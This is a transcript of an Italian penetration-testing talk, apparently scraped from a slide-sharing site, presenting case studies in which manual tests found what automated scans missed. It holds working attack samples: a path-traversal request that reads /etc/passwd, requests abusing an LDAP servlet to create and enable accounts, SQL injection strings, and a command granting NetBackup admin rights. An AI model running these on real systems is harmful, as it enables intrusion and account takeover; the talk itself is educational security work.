the PT conundrum ( and its ANTISEC formulation ) matteo falsetti - mfalsetti@enforcer.it - fusys@sikurezza.org
|
|
- Giuditta Roberta Abate
- 8 anni fa
- Visualizzazioni
Transcript
1 the PT conundrum ( and its ANTISEC formulation ) matteo falsetti - mfalsetti@enforcer.it - fusys@sikurezza.org
2 Chi sono ricercatore indipendente da diciannove anni da quattordici mi occupo professionalmente di penetration testing e vulnerability assessment non mi occupo (ancora) delle sole logiche aziendali
3 Agenda Penetration Test attack any vulnerability known and unknown operational weaknesses
4 Penetration Test It is a method of evaluating the security of a computer system or network by simulating an attack from malicious outsiders and/or malicious insiders. The process involves an active analysis of the system for any potential vulnerabilities that could result from poor or improper system configuration, both known and unknown hardware or software flaws, or operational weaknesses in process or technical countermeasures. This analysis is carried out from the position of a potential attacker and can involve active exploitation of security vulnerabilities.
5 Determining the feasibility of a particular set of attack vectors Identifying higher-risk vulnerabilities that result from a combination of lower-risk vulnerabilities exploited in a particular sequence Identifying vulnerabilities that may be difficult or impossible to detect with automated network or application vulnerability scanning software Assessing the magnitude of potential business and operational impacts of successful attacks Testing the ability of network defenders to successfully detect and respond to the attacks Providing evidence to support increased investments in security personnel and technology
6 Agenda Penetration Test attack any vulnerability known and unknown operational weaknesses
7 PT == attacco?! sotto-stimato ( meglio un assessment classico ) non compreso ( fate quel che dovete, ma non toccate nulla, non copiate o modificate alcun dato, non impersonate utenze altrui, non aumentate il carico della macchina, non... ) menomato da logiche aziendali estranee ( ok i sistemi A, C e D. Il B no, perchè fa parte della linea di esercizio e sistemi, che fa capo a X. I sistemi da E a H non li testiamo perchè non siamo riusciti a contattare il referente interno Y. )
8 PT == attacco?! sotto-stimato ( meglio un assessment classico ) gli non attaccanti compreso non firmano NDA e ( fate quel che dovete, ma non toccate nulla, non copiate o usano modificate campioni alcun dato, non proficui impersonate utenze dei altrui, target, non aumentate il carico della macchina, non... ) non significativi menomato da logiche aziendali estranee ( ok i sistemi A, C e D. Il B no, perchè fa parte della linea di esercizio e sistemi, che fa capo a X. I sistemi da E a H non li testiamo perchè non siamo riusciti a contattare il referente interno Y. )
9 Agenda Penetration Test attack any vulnerability known and unknown operational weaknesses
10 to Hash or not to Hash portale su intranet, SQL Injection RO nel presentation layer nessun altra vulnerabilità dati cifrati 8000 hash di password delle utenze
11 to Hash or not to Hash E F F D68666D413D3D io non riconosco l hash John the Ripper non riconosce l hash nessuno sembra riconoscere l hash How often have I said to you that when you have eliminated the impossible, whatever remains, however improbable, must be the truth? Sherlock Holmes
12 to Hash or not to $ Hash ftp xxx.xxx.xxx.xxx 222 Connected to xxx.xxx.xxx.xxx. 220 Microsoft FTP Service Name (xxx.xxx.xxx.xxx:root): ftp 331 Anonymous access allowed, send identity ( name) as password. Password: 230 Anonymous user logged in. Remote system type is Windows_NT. ftp> ls XYZCrypter 200 PORT command successful. 150 Opening ASCII mode data connection for /bin/ls :00AM <DIR> DLL :02AM <DIR> test :05AM <DIR> data 226 Transfer complete.
13 to Hash or not to Hash la dll è usata ovunque, in ogni altro portale e DB crittografia simmetrica mediante Rijndael la chiave usata è di soli 12 byte invece della lunghezza minima di 16 IV statico nella dll possibile usare le chiamate di mscorlib.dll o la stessa DLL proprietaria
14 to Hash or not to Hash la dll è usata ovunque, in ogni altro portale e DB crittografia simmetrica mediante Rijndael la chiave usata è di soli 12 byte invece della lunghezza minima di 16 IV statico nella dll possibile usare le chiamate di mscorlib.dll o la stessa DLL proprietaria
15 to Hash or not to Hash E F F D68666D413D3D ZQ391XK7
16 the LDAP reformulation portale WebSphere, JSP / Java, DBMS DB2 applicazione near-legacy, continuo rimaneggiamento dal vecchio port XSS, SQLI, Path Traversal, Direct Object Reference, Forced Browsing,... autenticazione sicura, LDAP (AD LDS), non manipolabile o aggirabile tutti hanno accesso READ su tutto, ruoli in WRITE ben verificati lato server
17 the LDAP reformulation il committente è a posto con quanto trovato sepolte in un vecchio rilascio rimasto nella webroot ci sono 2 servlet di download dei PDF INPUT Validation carente e path traversal portano ad Arbitrary File Read
18 the LDAP reformulation POST /XxxxxxxConfig/Srv/xxxxxFileNew HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Content-Type: application/x-www-form-urlencoded contenttype=text%2fhtml&iseries=n&filename=/etc/passwd il committente è a posto con quanto trovato sepolte HTTP/1.1 in un vecchio 200 OKrilascio rimasto nella webroot ci sono 2 servlet di download dei Date: PDF Wed, 06 May :12:49 GMT X-Powered-By: Servlet/ INPUT Validation carente e path traversal portano ad Arbitrary File Read root:!:0:0::/:/usr/bin/bash daemon:!:1:1::/etc: bin:!:2:2::/bin: sys:!:3:3::/usr/sys:...
19 the LDAP reformulation if (controlliformali()) { //frmlogin.ldap_tipo_azione.value = slrgetelementbyid("ldap_tipo_azione").value; frmlogin.oldpassword.value = passwordold; frmlogin.ldap_password.value = il committente è a posto con quanto trovato slrgetelementbyid("ldap_password").value; sepolte in un vecchio rilascio setstatoinput(false); rimasto nella webroot ci sono 2 servlet di download dei PDF LdapGestioneUtenti/gestione"; slrloadshow(); var url = contextpath + "/Srv/ INPUT Validation carente e var path post traversal = CreaSubmit(frmLogin); portano ad Arbitrary File Read } slrcallxmlhttp(url, post, 'avantiend');
20 the LDAP reformulation... public LdapGestioneUtenti() { oldpassword = "";... } il committente è a posto con quanto trovato... sepolte if(azione.equals("modificapwd")) in un vecchio rilascio rimasto nella webroot ci sono 2 servlet di try download dei PDF { INPUT Validation carente e path traversal portano ad Arbitrary File Read... } int result = LdapCheckUser.chkEnableUser(user, true); if(result == 0) LdapChgPwd.chgPwd(true, user, oldpassword, password, mustchangepwd); ComboUtil.respXmlHttp(response, ComboUtil.valCampo("esito", "OK", 'r'));
21 the LDAP reformulation GET /XxxxxxConfig/Srv/LdapGestioneUtenti/gestione? LDAP_USER=XXXXXXXXXXXX01P&LDAP_PASSWORD=Maggiopentest001 &LDAP_TIPO_AZIONE=modificaPwd il committente è a posto con quanto trovato GET sepolte /XxxxxxConfig/Srv/LdapGestioneUtenti/gestione? in un vecchio rilascio rimasto nella webroot ci sono 2 servlet di LDAP_USER=ENFORCER02&LDAP_PASSWORD=Maggiopentest001&LDAP download dei PDF _TIPO_AZIONE=crea INPUT Validation carente e path traversal portano ad Arbitrary File Read GET /XxxxxxConfig/Srv/LdapGestioneUtenti/gestione? LDAP_USER=ENFORCER02&LDAP_PASSWORD=Maggiopentest001&LDAP _TIPO_AZIONE=abilita
22 Agenda Penetration Test attack any vulnerability known and unknown operational weaknesses
23
24 L hardening è uguale per tutti. anonimo
25 L hardening è uguale per tutti. anonimo
26
27
28 No DBA No filesystem I/O o exec SQLI httpd #2 ORACLE Schema WBMSTR SQLI httpd #1 ORACLE Schema DOCS 0wned Domain
29 SQLI httpd #2 ORACLE Schema WBMSTR SQLI httpd #1 ORACLE Schema DOCS Table CMS_uSeRS Schema Ops$ACME informazioni correlabili a livello umano, sono spesso disseminate in più schemi su più istanze differenti Table Landesk_users 0wned Domain
30 (fusys) ~/ACMEIT/sqlmap/dumps > grep Matteo Landesk_users.csv SQLI httpd #2 ORACLE Schema WBMSTR Table CMS_uSeRS SQLI httpd #1 ORACLE Schema DOCS ACME - palazzina,beepbeep,italy,699,null,matteo,"dala2naper,il", ,0,1,699,Falsetti Schema Ops$ACME Table Landesk_users (fusys) ~/ACMEIT/sqlmap/dumps > grep Matteo CMS_uSeRS.csv 10299,1,1,1,1,m.falsetti@acmeit.it,canlogin,fal00mat,Matteo,Falsetti 0wned Domain
31 semi 0-day PHP LFI httpd #2 SQLI httpd #2 ORACLE Schema WBMSTR Table CMS_uSeRS SQLI httpd #1 ORACLE Schema DOCS Schema Ops$ACME PHP Shell FTP Access httpd #1 Table Landesk_users 0wned Domain
32 semi 0-day PHP LFI httpd #2 SQLI httpd #2 ORACLE Schema WBMSTR Table CMS_uSeRS SQLI httpd #1 ORACLE Schema DOCS Schema Ops$ACME PHP Shell FTP Access httpd #1 Table Landesk_users reverse shell + port forwarding 0wned Domain
33 semi 0-day PHP LFI httpd #2 SQLI httpd #2 ORACLE Schema WBMSTR Table CMS_uSeRS SQLI httpd #1 ORACLE Schema DOCS Schema Ops$ACME PHP Shell FTP Access httpd #1 Table Landesk_users reverse shell + port forwarding database enumeration oracle:oracle 0wned Domain
34 SQLI httpd #2 ORACLE Schema WBMSTR SQLI httpd #1 ORACLE Schema DOCS semi 0-day PHP LFI httpd #2 unico account debole è sul DB core FTP Access httpd #1 Table CMS_uSeRS Schema Ops$ACME accesso in shell sull AIX nodo centrale della rete PHP Shell reverse shell + port forwarding database enumeration oracle:oracle Table Landesk_users l account oracle su un DB server è meglio di root 0wned Domain
35 semi 0-day PHP LFI httpd #2 SQLI httpd #2 ORACLE Schema WBMSTR Table CMS_uSeRS SQLI httpd #1 ORACLE Schema DOCS Schema Ops$ACME PHP Shell FTP Access httpd #1 Table Landesk_users reverse shell + port forwarding database enumeration oracle:oracle 0wned Domain OID package source code
36 regressione nel codice non visibile dalle signature degli scanner semi 0-day PHP LFI httpd #2 rischio quantificato come basso solo HTTPd e FTPd sui web server credenziali complesse SQL Injection non automatizzata SQLI httpd #2 ORACLE Schema WBMSTR Table CMS_uSeRS SQLI httpd #1 ORACLE Schema DOCS errore di separazione logica degli schemi Oracle Schema Ops$ACME PHP Shell hardening locale non visibile da VA esterno reverse shell + port forwarding FTP Access httpd #1 database enumeration oracle:oracle Table Landesk_users 0wned Domain OID è complesso package source automatizzare code processi di data mining guidati da deduzione e intuizione
37 Risultati del VA Risultati del PT nessun rischio HIGH semi 0-day qualche notifica su SSL, sui PHP LFI httpd #2 protocolli di comunicazione insicuri e su possibili injection da verificare PHP Shell a mano nessuna credenziale di default esposta su Internet reverse shell + port forwarding FTP Access httpd #1 database enumeration SQLI httpd #2 ORACLE Schema WBMSTR Table CMS_uSeRS SQLI httpd #1 ORACLE Schema DOCS compromissione di un server perimetrale Schema Ops$ACME compromissione dell Oracle OID e delle Table applicazioni Landesk_users privilegiate da esso autenticate compromissione oracle:oracle dati degli utenti 0wned Domain OID package source code
38
39
40
41 Come on Leonard. If you re gonna teach history, these are the kind of facts you ll have to know.
42 IP TCP HTTP
43 GET /brandprofile/vulnus.aspx?xyz=acm IP %27%3B%20CREATE%20TABL%20sqlmapoutput (data%20varchar(8000))%3b--%20and TCP %20%27PLyKB%27=%27PLyKB HTTP HTTP/1.1
44
45 IP TCP HTTP
46 GET /brandprofile/vulnus.aspx?foo=aaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa IP aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa TCP aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa HTTP aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&xyz=acm%27%3b %20CREATE%20 TABLE%20sqlmapoutput%28data%20varchar %288000%29%29%3B--%20AND%20%27PLyKB%27=%27PLyKB HTTP/1.1
47 IP TCP HTTP
48 IP TCP SQL SELECT SYSDATE FROM DUAL
49 IP TCP SQL SELECT SYSDATE FROM DUAL
50 IP TCP SQL SELECT SYSDATE FROM DUAL
51 E L B T R A O P D Z X Y
52 D R O P X Y T Z A B L E
53 D R O P X Y T Z A B L E
54 Agenda Penetration Test attack any vulnerability known and unknown operational weaknesses
55 Sala Server Veritas Netbackup Postazioni di Lavoro
56 Sala Server Veritas Netbackup Postazioni di Lavoro
57 Password Guessing 0wned Domain
58 Password Guessing Srv Enable 0wned Domain
59 Password Guessing Srv Enable SADMIND Exploit 0wned Domain
60 Password Guessing Srv Enable Local Privilege Escalation SADMIND Exploit echo falsema ADMIN=ALL JBP=ALL >> /nbudb/openv/java/auth.conf 0wned Domain
61 Password Guessing Srv Enable Local Privilege Escalation SADMIND Exploit Netbackup Administration 0wned Domain
62 Password Guessing Srv Enable Local Privilege Escalation SADMIND Exploit Netbackup Administration 0wned Domain
63 Windows 2003 server R2 32bit edition Netbackup 5.1 install + patch Password Guessing Software Leech Srv Enable Local Privilege Escalation SADMIND Exploit Netbackup Administration 0wned Domain
64 Password Guessing Software Leech Srv Enable Local Privilege Escalation SADMIND Exploit Win2003 VM Netbackup Administration 0wned Domain
65 Password Guessing Software Leech Srv Enable Local Privilege Escalation SADMIND Exploit Win2003 VM Netbackup Administration AD half restore 0wned Domain
66 Password Guessing Software Leech Srv Enable Local Privilege Escalation Netbackup Administration SADMIND Exploit AD half restore restore del server AD di backup Win2003 VM reinstallazione driver installazione servizio nel registro creazione di utenza di dominio 0wned Domain
67 Password Guessing Software Leech Srv Enable Local Privilege Escalation SADMIND Exploit Win2003 VM Netbackup Administration AD half restore AD corruption 0wned Domain
68 Password Guessing Software Leech Srv Enable Local Privilege Escalation SADMIND Exploit Win2003 VM Netbackup Administration AD half restore AD corruption 0wned Domain
69 Password Guessing Software Leech Srv Enable Local Privilege Escalation SADMIND Exploit Win2003 VM Netbackup Administration AD half restore AD corruption 0wned Domain
70 rischio quantificato come basso solo SSHd e portmapper credenziale non di default errore procedurale VA non verifica la natura dei dati l analisi della componente umana nelle procedure aziendali non è quasi mai automatizzabile Password Guessing Software Leech Srv Enable Local Privilege Escalation patch level non verificabile da VA blackbox Netbackup Administration SADMIND Exploit AD half restore 0wned Domain Win2003 VM AD corruption misteri delle race condition in architetture complesse non verificabili o quantificabili nei VA automatizzati
71 Risultati del VA Risultati del PT nessun rischio HIGH qualche notifica su SSL e su protocolli di comunicazione insicuri Password Guessing Local Privilege Escalation Netbackup Administration nessuna credenziale di default Srv Enable SADMIND Exploit AD half restore Software Leech Win2003 VM AD corruption compromissione dei backup compromissione del dominio Active Directory e di ogni sua componente compromissione dati degli utenti 0wned Domain
72 the PT conundrum ( and its ANTISEC formulation ) matteo falsetti - mfalsetti@enforcer.it - fusys@sikurezza.org
Chain Exploiting the Business
Chain Exploiting the Business mfalsetti@enforcer.it 1 Chi sono ricercatore indipendente da più di quindici anni da dieci mi occupo professionalmente di penetration testing e vulnerability assessment non
DettagliCorso di Informatica Modulo T3 B2 - Database in rete
Corso di Informatica Modulo T3 B2 - Database in rete 1 Prerequisiti Programmazione web Applicazione web Modello OSI Architettura client/server Conoscenze generali sui database Tecnologia ADO in Visual
Dettagli0wning the Business, Reloaded. x2f\x73\x68\x68\x. Matteo Falsetti - mfalsetti[at]enforcer.it - fusys[at]sikurezza.org
0wning the Business, Reloaded Matteo Falsetti - mfalsetti[at]enforcer.it - fusys[at]sikurezza.org Chi sono ricercatore indipendente vulnerability assessment non mi occupo (ancora) da più di quindici anni
DettagliObiettivi. Al termine del webinar sarete in grado di:
SSL VPN Modulo 1 1 2012 Fortinet Training Services. This training may not be recorded in any medium, disclosed, copied, reproduced or distributed to anyone without prior written consent of an authorized
DettagliRealizzazione del nuovo cruscotto direzionale per il monitoraggio della gestione aziendale
Sommario 1. INTRODUZIONE... 3 2. DATI TECNICI DELL AMBIENTE DI PRODUZIONE... 4 2.1. UTENTE ORACLE PROPRIETARIO DELL INSTALLAZIONE... 4 2.2. ENVIRONMENT MICROSOFT... 4 2.3. ENVIRONMENT AIX... 4 2.4. PRE-REQUISITI
DettagliIntroduzione Kerberos. Orazio Battaglia
Orazio Battaglia Il protocollo Kerberos è stato sviluppato dal MIT (Massachusetts Institute of Tecnology) Iniziato a sviluppare negli anni 80 è stato rilasciato come Open Source nel 1987 ed è diventato
DettagliInstallazione di GFI LANguard Network Security Scanner
Installazione di GFI LANguard Network Security Scanner Requisiti di sistema Installare GFI LANguard Network Security Scanner su un computer in possesso dei seguenti requisiti: Sistemi operativi Windows
DettagliEsempi pratici, risultati e contromisure consigliate. Massimo Biagiotti
L attività di un Ethical Hacker Esempi pratici, risultati e contromisure consigliate Massimo Biagiotti Information Technology > Chiunque operi nel settore sa che il panorama dell IT è in continua evoluzione
DettagliAGGIORNAMENTO MENSILE DI SICUREZZA MICROSOFT
AGGIORNAMENTO MENSILE DI SICUREZZA MICROSOFT SEGNALAZIONE DEL 16/12/2010 NR.: 15-2010 (LIVELLO DI RISCHIO: 3 SU 5) INTRODUZIONE Si segnala che Microsoft, nell'ambito del suo programma di aggiornamento
DettagliProtezione dei dati in azienda: la difficoltà di coniugare obiettivi e complessità
L Eccellenza nei servizi e nelle soluzioni IT integrate. Protezione dei dati in azienda: la difficoltà di coniugare obiettivi e complessità 2012 MARZO Omnitech s.r.l. Via Fiume Giallo, 3-00144 Roma Via
DettagliSiti web centrati sui dati (Data-centric web applications)
Siti web centrati sui dati (Data-centric web applications) 1 A L B E R T O B E L U S S I A N N O A C C A D E M I C O 2 0 1 2 / 2 0 1 3 WEB La tecnologia del World Wide Web (WWW) costituisce attualmente
DettagliApplicazioni web centrati sui dati (Data-centric web applications)
Applicazioni web centrati sui dati (Data-centric web applications) 1 ALBERTO BELUSSI ANNO ACCADEMICO 2009/2010 WEB La tecnologia del World Wide Web (WWW) costituisce attualmente lo strumento di riferimento
DettagliARCHIVIA PLUS VERSIONE SQL SERVER
Via Piemonte n. 6-6103 Marotta di Mondolfo PU tel. 021 960825 fax 021 9609 ARCHIVIA PLUS VERSIONE SQL SERVER Istruzioni per configurazione sql server e conversione degli archivi Versione n. 2011.09.29
DettagliPTSv2 in breve: La scelta migliore per chi vuole diventare un Penetration Tester. Online, accesso flessibile e illimitato
La scelta migliore per chi vuole diventare un Penetration Tester PTSv2 in breve: Online, accesso flessibile e illimitato 900+ slide interattive e 3 ore di lezioni video Apprendimento interattivo e guidato
DettagliPlugin Single Sign-On
NEXT-GEN USG Plugin Single Sign-On Configurazione Agent SSO su AD Verificare di avere l ultima release del client SSO installato su Windows Server. AL momento di redigere la guida la più recente è la 1.0.3
DettagliApplication Server per sviluppare applicazioni Java Enterprise
Application Server per sviluppare applicazioni Java Enterprise Con il termine Application Server si fa riferimento ad un contenitore, composto da diversi moduli, che offre alle applicazioni Web un ambiente
DettagliSommario. Oracle Database 10g (laboratorio) Grid computing. Oracle Database 10g. Concetti. Installazione Oracle Database 10g
Sommario Oracle Database 10g (laboratorio) Dr. Daniele Barone Dr. Simone Grega 1 2 Oracle Database 10g Offre alte qualità del servizio: Performance; Scalabilità; Sicurezza; Affidabilità. Gestione autonoma
DettagliReti di calcolatori. Reti di calcolatori
Reti di calcolatori Reti di calcolatori Rete = sistema di collegamento tra vari calcolatori che consente lo scambio di dati e la cooperazione Ogni calcolatore e un nodo, con un suo indirizzo di rete Storia:
DettagliPenetration Testing Aziendale con BeEF
Penetration Testing Aziendale con BeEF Giovanni Cattani Giovanni Cattani Security Specialist @ Secure Network S.r.l. #penetrationtest #vulnerabilityassessment #web #mobile #network #riskassessment BeEF
DettagliInstallazione Alfresco Avanzata
QBR Novembre 2011 Installazione Alfresco Avanzata www.qbreng.it I Passi da compiere Installare Java SE Development Kit (JDK) 6.0 (http://it.sun.com/) Installare Database - RDBMS Open Source MySQL (http://dev.mysql.com/downloads)
DettagliSystem & Network Integrator. Rap 3 : suite di Identity & Access Management
System & Network Integrator Rap 3 : suite di Identity & Access Management Agenda Contesto Legislativo per i progetti IAM Impatto di una soluzione IAM in azienda La soluzione di SysNet: Rap 3 I moduli l
DettagliManuale per la configurazione di AziendaSoft in rete
Manuale per la configurazione di AziendaSoft in rete Data del manuale: 7/5/2013 Aggiornamento del manuale: 2.0 del 10/2/2014 Immagini tratte da Windows 7 Versione di AziendaSoft 7 Sommario 1. Premessa...
DettagliKLEIS A.I. SECURITY SUITE
KLEIS A.I. SECURITY SUITE Protezione dei servizi non web Kleis A.I. SecureMail, Kleis A.I. SecureEmulation, Kleis A.I. SecureXEmulation, Kleis A.I. SecureTransfer, Kleis A.I. SecureShare www.kwaf.it Protezione
Dettagli22 Ottobre 2014. #CloudConferenceItalia
22 Ottobre 2014 #CloudConferenceItalia Gli Sponsor AZU03 Microsoft Azure e Active Directory Giampiero Cosainz walk2talk giampiero.cosainz@walk2talk.it @GpC72 Ruberti Michele walk2talk michele.ruberti@walk2talk.it
DettagliLBSEC. http://www.liveboxcloud.com
2014 LBSEC http://www.liveboxcloud.com LiveBox Srl non rilascia dichiarazioni o garanzie in merito al contenuto o uso di questa documentazione e declina qualsiasi garanzia espressa o implicita di commerciabilità
DettagliAttacchi alle Applicazioni Web
Attacchi alle Applicazioni Web http://www.infosec.it info@infosec.it Relatore: Matteo Falsetti Webbit03 Attacchi alle Applicazioni Web- Pagina 1 Applicazioni web: definizioni, scenari, rischi ICT Security
DettagliGERARCHIE RICORSIVE - SQL SERVER 2008
GERARCHIE RICORSIVE - SQL SERVER 2008 DISPENSE http://dbgroup.unimo.it/sia/gerarchiericorsive/ L obiettivo è quello di realizzare la tabella di navigazione tramite una query ricorsiva utilizzando SQL SERVER
DettagliTracciabilità degli utenti in applicazioni multipiattaforma
Tracciabilità degli utenti in applicazioni multipiattaforma Case Study assicurativo/bancario Yann Bongiovanni y.bongiovanni@integra-group.it Roma, 4 ottobre 2006 Retroscena Un azienda multinazionale del
DettagliIntroduzione a Windows XP Professional Installazione di Windows XP Professional Configurazione e gestione di account utente
Programma Introduzione a Windows XP Professional Esplorazione delle nuove funzionalità e dei miglioramenti Risoluzione dei problemi mediante Guida in linea e supporto tecnico Gruppi di lavoro e domini
DettagliEsempi pratici di in-sicurezza dei sistemi e delle informazioni
Esempi pratici di in-sicurezza dei sistemi e delle informazioni Relatore: Cyber Security e sicurezza delle informazioni Bolzano, 11 dicembre 2015 TIS innovation park Igor Falcomatà Chief Technical Officer
DettagliLaboratorio Progettazione Web PHP e MySQL - Lezione 9. Andrea Marchetti IIT-CNR andrea.marchetti@iit.cnr.ita 2012/2013
Laboratorio Progettazione Web PHP e MySQL - Lezione 9 Andrea Marchetti IIT-CNR andrea.marchetti@iit.cnr.ita 2012/2013 Architettura di una applicazione Web Browser Web HTTP Server Web API Dati Presentation
DettagliApprofondimenti. Contenuti
Approfondimenti dott. Stefano D. Fratepietro steve@stevelab.net C I R S F I D Università degli studi di Bologna stevelab.net Creative Commons license Stefano Fratepietro - www.stevelab.net 1 Contenuti
DettagliIndice. Introduzione PARTE PRIMA L ARCHITETTURA DEI DATABASE 1
Indice Introduzione XI PARTE PRIMA L ARCHITETTURA DEI DATABASE 1 Capitolo 1 Introduzione all architettura di Oracle 3 1.1 I database e le istanze 3 1.2 Installazione del software 9 1.3 Creazione di un
DettagliReti di Calcolatori PROTOCOLLO FTP
Reti di Calcolatori PROTOCOLLO FTP D. Talia RETI DI CALCOLATORI - UNICAL 8-1 File File Transfer Protocol Modello FTP Operazioni FTP Comandi del protocollo Esempi di Client FTP avanzati D. Talia RETI DI
DettagliAggiornamento del software
Note di release Fiery X3eTY2 65_55C-KM Color Server versione 1.1a Programmi di utilità Questo documento contiene informazioni relative ai programmi di utilità per Fiery X3eTY2 65_55C-KM Color Server versione
DettagliArchitettura del Sistema Presenze
Architettura del Sistema Presenze Guido Guizzunti 28 Marzo 2012 Sommario I componenti del sistema Architettura hardware Architettura di rete Architettura software Alcuni miglioramenti I rilasci 2 Sommario
DettagliElementi di Sicurezza e Privatezza Lezione 19 Web Application Fingerprintig
Elementi di Sicurezza e Privatezza Lezione 19 Web Application Fingerprintig Chiara Braghin chiara.braghin@unimi.it! Fingerprinting (1) Definizione generica: A fingerprint is defined as: 1. The impression
DettagliElementi di Sicurezza e Privatezza Lezione 19 Web Application Fingerprintig. Chiara Braghin. chiara.braghin@unimi.it! Fingerprinting (1)
Elementi di Sicurezza e Privatezza Lezione 19 Web Application Fingerprintig Chiara Braghin chiara.braghin@unimi.it! Fingerprinting (1) Definizione generica: A fingerprint is defined as: 1. The impression
DettagliNEXT-GEN USG: Filtri Web
NEXT-GEN USG: Filtri Web Content-Filter & Single Sign On Guida alla configurazione Content-Filter con policy di accesso basate su utenti lactive directory e SSO con USG con firmware ZLD 4.1 Configurazione
DettagliDatabase e reti. Piero Gallo Pasquale Sirsi
Database e reti Piero Gallo Pasquale Sirsi Approcci per l interfacciamento Il nostro obiettivo è, ora, quello di individuare i possibili approcci per integrare una base di dati gestita da un in un ambiente
Dettagli1. La rete wireless per noi.
1. La rete wireless per noi. Stiamo allestendo un servizio di rete wireless esteso per quanto possibile a tutto il Dipartimento. Per cominciare le antenne sono state disposte nei luoghi in cui è più difficile
DettagliCarlo, Pelliccioni Security
OWASP Top 10 2007 Le nostre informazioni sono veramente al sicuro? Carlo, Pelliccioni Security Consultant, @Mediaservice.net OWASP-Day Università La Sapienza Rome 10 th September 2007 carlo@mediaservice.net
DettagliREQUISITI TECNICI HR INFINITY ZUCCHETTI
REQUISITI TECNICI HR INFINITY ZUCCHETTI Documento aggiornato al 21 Novembre 2014 (Valido fino al 30/06/2015) Le versioni di sistemi operativi di seguito indicati rappresentano quelle utilizzate nei nostri
Dettagli[1] Cross Site Scripting [2] Remote / Local File Inclusion [3] SQL Injection
---------------------------------------------------------------------..... _/ / _ / / \ \/ / / / / \ / \ \ \ / /_/ \ /\ / \ \ \ / /_/ > Y \ \ \ >\_/ / > / \ / / \/ \/ \/ \/ / / \/ ---------------------------------------------------------------------
DettagliCiclo di vita del software: strumenti e procedure per migliorarne la sicurezza. Roberto Ugolini roberto.ugolini@postecom.it
Ciclo di vita del software: strumenti e procedure per migliorarne la sicurezza Roberto Ugolini 1 Il processo di sviluppo sicuro del codice (1/2) Il processo di sviluppo sicuro del codice () è composto
DettagliDrupal. E vai con un po' di Drupal for Dummies... :D. Copyright by hachreak www.hachreak.org
Drupal E vai con un po' di Drupal for Dummies... :D Copyright by hachreak www.hachreak.org Cos'è Drupal? Drupal è un content management framework, content management system (CMS) modulare scritto in linguaggio
DettagliSecurity by example. Alessandro `jekil` Tanasi alessandro@tanasi.it http://www.lonerunners.net. LUG Trieste. Alessandro Tanasi - alessandro@tanasi.
Security by example Alessandro `jekil` Tanasi alessandro@tanasi.it http://www.lonerunners.net Chi vi parla? Consulente Penetration tester Forenser Sviluppatore di software per il vulnerability assessment
DettagliInstallazione Web Channel Experience 1.0 Based on NW 7.3 sp02, Oracle 11.2.0.2
Installazione Web Channel Experience 1.0 Based on NW 7.3 sp02, Oracle 11.2.0.2 Table of Contents Prerequisite checker... 2 Installazione NetWeaver 7.3... 3 Usage type installati... 20 Configurazione HTTPS
DettagliGUIDA ALLE SOLUZIONI
Questa guida vuole essere uno strumento di facile consultazione, per chi utilizzando il software THC e qualsiasi dispositivo TV collegato all antenna centralizzata il software al termine della scansione
DettagliProtocolli per il Web. Impianti Informatici. Protocolli applicativi
Protocolli per il Web Protocolli applicativi I protocolli applicativi 2 Applicazioni Socket interface HTTP (WEB) SMTP (E-MAIL) FTP... NFS RPC DNS... Trasporto TCP UDP Rete ICMP RIP OSPF IP ARP RARP Non
DettagliCorso di Sicurezza Informatica. Sicurezza del software. Ing. Gianluca Caminiti
Corso di Sicurezza Informatica Sicurezza del software Ing. Gianluca Caminiti SQL Injection Sommario Premessa sul funzionamento dei siti dinamici SQL Injection: Overview Scenari di attacco: Errata gestione
DettagliCORSO DI ALGORITMI E PROGRAMMAZIONE. JDBC Java DataBase Connectivity
CORSO DI ALGORITMI E PROGRAMMAZIONE JDBC Java DataBase Connectivity Anno Accademico 2002-2003 Accesso remoto al DB Istruzioni SQL Rete DataBase Utente Host client Server di DataBase Host server Accesso
DettagliVulnerabilità informatiche (semplici)..
Vulnerabilità informatiche (semplici).. in infrastrutture complesse....il contenuto di questo speech è di pura fantasia, ogni riferimento a infrastrutture reali o fatti realmente accaduti è puramente casuale
DettagliReti di Calcolatori PROTOCOLLO FTP. File. File Transfer Protocol Modello FTP Operazioni FTP Comandi del protocollo Esempi di Client FTP avanzati
Reti di Calcolatori PROTOCOLLO FTP D. Talia RETI DI CALCOLATORI - UNICAL 8-1 File Modello FTP Operazioni FTP Comandi del protocollo Esempi di Client FTP avanzati D. Talia RETI DI CALCOLATORI - UNICAL 8-2
DettagliTecnologia e Applicazioni Internet 2011/12
Tecnologia e Applicazioni Internet 2011/12 Lezione 4 - Persistenza Matteo Vaccari http://matteo.vaccari.name/ matteo.vaccari@uninsubria.it Perché usare un DB relazionale? Per l accesso concorrente ai dati
DettagliMaking the Internet Secure TM
Making the Internet Secure TM e-security DAY 3 luglio 2003, Milano Kenneth Udd Senior Sales Manager SSH Communications Security Corp. SSH Communications Security Corp Storia Fondata nel 1995 Ideatrice
DettagliDB2 Universal Database (UDB) DB2 Universal Database (UDB)
DB2 Universal Database (UDB) Sistemi Informativi L-A Home Page del corso: http://www-db.deis.unibo.it/courses/sil-a/ Versione elettronica: DB2Presentazione2009.pdf Sistemi Informativi L-A DB2 Universal
DettagliSSO Specifiche Funzionali
SSO Specifiche Funzionali oggetto... : SSO Siti Istituzionali Class abbonamenti data ultimo aggiornamento... : 29/01/2014 N Data Descrizione Approvato da: 1.0 11-03-2013 Versione 1.0 Roberto Santosuosso
DettagliProgrammazione dei socket con TCP #2
I Il Server e il Client si scambiano messaggi attraverso la rete mediante un dell API (Application Programming Interface) Telematica II 10. Esercitazione/Laboratorio 3 Server ports Clients user space Socket
Dettagli<Insert Picture Here> Gli aspetti di sicurezza nella gestione documentale
